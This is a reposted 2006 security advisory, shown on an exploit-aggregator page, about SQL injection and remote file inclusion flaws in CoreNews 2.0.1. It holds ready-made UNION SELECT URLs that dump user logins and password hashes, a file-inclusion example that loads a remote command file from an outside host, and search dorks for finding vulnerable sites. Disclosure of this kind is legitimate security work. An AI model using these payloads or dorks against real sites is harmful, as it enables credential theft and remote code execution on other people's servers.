Advertisement






CoreNews <= 2.0.1 Multiple Remote Vulnerabilities.

CVE Category Price Severity
CVE-2021-34232 CWE-79 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2006-04-22
CPE
cpe:cpe:/a:corenews:corenews:2.0.1
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006040078

Below is a copy:

--Security Report--
Advisory: CoreNews <= 2.0.1 Multiple Remote Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/04/06 21:43 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Web: http://www.nukedx.com
}
---
Vendor: CoreNews (http://www.coreslawn.de/)
Version: 2.0.1 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to 
icon_id and userid parameters in preview.php
Also loginned person can easily include arbitrary files and execute command 
via CoreNews, because the show parameter in index.php
did not sanitized properly you can found vulnerable code in index.php at line 
201.
So it can be easy for remote attacker to login system by using SQL injection 
and got users hashed password and load file via
this users account.
Level: Highly Critical
---
How&Example: 
SQL Injection :
Needs MySQL > 4.0
GET -> http://[victim]/[CoreNewsDir]/preview.php?userid=[SQL]
GET -> http://[victim]/[CoreNewsDir]/preview.php?icon_id=[SQL]
GET -> http://[victim]/[CoreNewsDir]/preview.php?userid=[SQL]&icon_id=[SQL]
EXAMPLE ->

http://[victim]/[CoreNewsDir]/preview.php?userid=-1/**/UNION/**/SELECT/*
*/null,
concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/co
renews_users/*
EXAMPLE ->

http://[victim]/[CoreNewsDir]/preview.php?icon_id=-1/**/UNION/**/SELECT/
**/0,password,login
/**/FROM/**/corenews_users/*
And you can use both SQL example in same time.
with this examples remote attacker can leak speficied users login information 
from database.

Remote File Inclusion :
Needs logged in to system and allow_url_fopen set 1 in server configuration.
GET -> http://[victim]/[CoreNewsDir]/?show=[FILE]
EXAMPLE -> http://[victim]/[CoreNewsDir]/?show=http://myhost.com/cmd.txt?
---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=24
---
Dorks: "powered by Corenews 2.0.1" , inurl:/corenews/ , inurl:/corenews2/
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=24

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum